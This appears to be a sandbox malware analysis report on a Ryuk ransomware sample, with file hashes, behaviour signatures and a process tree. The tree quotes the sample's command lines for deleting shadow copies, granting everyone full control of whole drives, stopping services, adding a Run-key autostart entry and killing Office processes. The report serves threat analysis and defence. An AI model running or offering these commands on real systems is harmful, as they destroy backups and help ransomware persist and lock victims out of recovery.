Analysis

  • max time kernel
    34s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    07-03-2021 22:11

General

  • Target

    860e50.bin.exe

  • Size

    196KB

  • MD5

    484a2bcb1335ac97ee91194f4c0964bc

  • SHA1

    ad11ed52ab33ad05eb9b1e9ade134ca1348acc81

  • SHA256

    40b865d1c3ab1b8544bcf57c88edd30679870d40b27d62feb237a19f0c5f9cd1

  • SHA512

    6e61612bd29425c5ab9b648fa83bc2d8616071247f8659aa316ab9d4adde0a9ceb9301737bb4216db223dfdd371106da75463f6d7e3a88e1c4cdd6c821f3935f

Malware Config

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
    1⤵
      PID:3212
    • C:\Windows\system32\DllHost.exe
      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
      1⤵
        PID:3680
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:3436
        • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
          1⤵
            PID:3232
          • c:\windows\system32\taskhostw.exe
            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
            1⤵
              PID:2412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
              1⤵
                PID:2308
              • c:\windows\system32\sihost.exe
                sihost.exe
                1⤵
                  PID:2300
                • C:\Users\Admin\AppData\Local\Temp\860e50.bin.exe
                  "C:\Users\Admin\AppData\Local\Temp\860e50.bin.exe"
                  1⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1812
                  • C:\Users\Admin\AppData\Local\Temp\dqlkEIY.exe
                    "C:\Users\Admin\AppData\Local\Temp\dqlkEIY.exe" 8 LAN
                    2⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3596
                    • C:\Windows\SysWOW64\icacls.exe
                      icacls "C:\*" /grant Everyone:F /T /C /Q
                      3⤵
                      • Modifies file permissions
                      PID:3192
                    • C:\Windows\SysWOW64\icacls.exe
                      icacls "D:\*" /grant Everyone:F /T /C /Q
                      3⤵
                      • Modifies file permissions
                      PID:1152
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c "WMIC.exe shadowcopy delet"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1240
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        WMIC.exe shadowcopy delet
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3928
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      3⤵
                      • Interacts with shadow copies
                      PID:1980
                    • C:\Windows\SysWOW64\net.exe
                      "C:\Windows\System32\net.exe" stop "samss" /y
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3052
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop "samss" /y
                        4⤵
                          PID:3044
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\dqlkEIY.exe" /f /reg:64
                        3⤵
                          PID:7456
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\dqlkEIY.exe" /f /reg:64
                            4⤵
                              PID:7560
                          • C:\Windows\SysWOW64\net.exe
                            "C:\Windows\System32\net.exe" stop "samss" /y
                            3⤵
                              PID:14496
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "samss" /y
                                4⤵
                                  PID:14592
                              • C:\Windows\SysWOW64\net.exe
                                "C:\Windows\System32\net.exe" stop "samss" /y
                                3⤵
                                  PID:46648
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop "samss" /y
                                    4⤵
                                      PID:46776
                                • C:\Windows\SysWOW64\net.exe
                                  "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:712
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop "audioendpointbuilder" /y
                                    3⤵
                                      PID:2792
                                  • C:\Windows\SysWOW64\net.exe
                                    "C:\Windows\System32\net.exe" stop "samss" /y
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3256
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop "samss" /y
                                      3⤵
                                        PID:192
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\*" /grant Everyone:F /T /C /Q
                                      2⤵
                                      • Modifies file permissions
                                      PID:2844
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c "WMIC.exe shadowcopy delet"
                                      2⤵
                                        PID:1148
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          WMIC.exe shadowcopy delet
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4612
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\860e50.bin.exe" /f /reg:64
                                        2⤵
                                          PID:1132
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\860e50.bin.exe" /f /reg:64
                                            3⤵
                                            • Adds Run key to start application
                                            PID:4624
                                        • C:\Windows\SysWOW64\vssadmin.exe
                                          vssadmin.exe Delete Shadows /all /quiet
                                          2⤵
                                          • Interacts with shadow copies
                                          PID:3880
                                        • C:\Windows\SysWOW64\net.exe
                                          "C:\Windows\System32\net.exe" stop "samss" /y
                                          2⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2164
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop "samss" /y
                                            3⤵
                                              PID:4164
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "D:\*" /grant Everyone:F /T /C /Q
                                            2⤵
                                            • Modifies file permissions
                                            PID:1584
                                          • C:\Windows\SysWOW64\net.exe
                                            "C:\Windows\System32\net.exe" stop "samss" /y
                                            2⤵
                                              PID:13328
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop "samss" /y
                                                3⤵
                                                  PID:13432
                                              • C:\Windows\SysWOW64\net.exe
                                                "C:\Windows\System32\net.exe" stop "samss" /y
                                                2⤵
                                                  PID:15800
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop "samss" /y
                                                    3⤵
                                                      PID:16408
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:44520
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "C:\Windows\System32\net.exe" stop "samss" /y
                                                    2⤵
                                                      PID:44824
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop "samss" /y
                                                        3⤵
                                                          PID:45112
                                                      • C:\Windows\SysWOW64\net.exe
                                                        "C:\Windows\System32\net.exe" stop "samss" /y
                                                        2⤵
                                                          PID:49480
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop "samss" /y
                                                            3⤵
                                                              PID:50040
                                                        • C:\Windows\system32\DllHost.exe
                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                          1⤵
                                                            PID:3860
                                                          • C:\Windows\system32\vssvc.exe
                                                            C:\Windows\system32\vssvc.exe
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4036
                                                          • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
                                                            "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "C:\Users\Admin\Desktop\MergeConnect.potx"
                                                            1⤵
                                                              PID:16988

                                                            Network

                                                            MITRE ATT&CK Enterprise v6

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • memory/1812-5-0x00000000030F0000-0x00000000030F1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1812-6-0x00000000038F0000-0x00000000038F1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/3596-16-0x0000000002BB0000-0x0000000002BB1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/3596-15-0x00000000023B0000-0x00000000023B1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/16988-99-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/16988-100-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/16988-101-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/16988-102-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/16988-103-0x00007FF8C6B80000-0x00007FF8C71B7000-memory.dmp

                                                              Filesize

                                                              6.2MB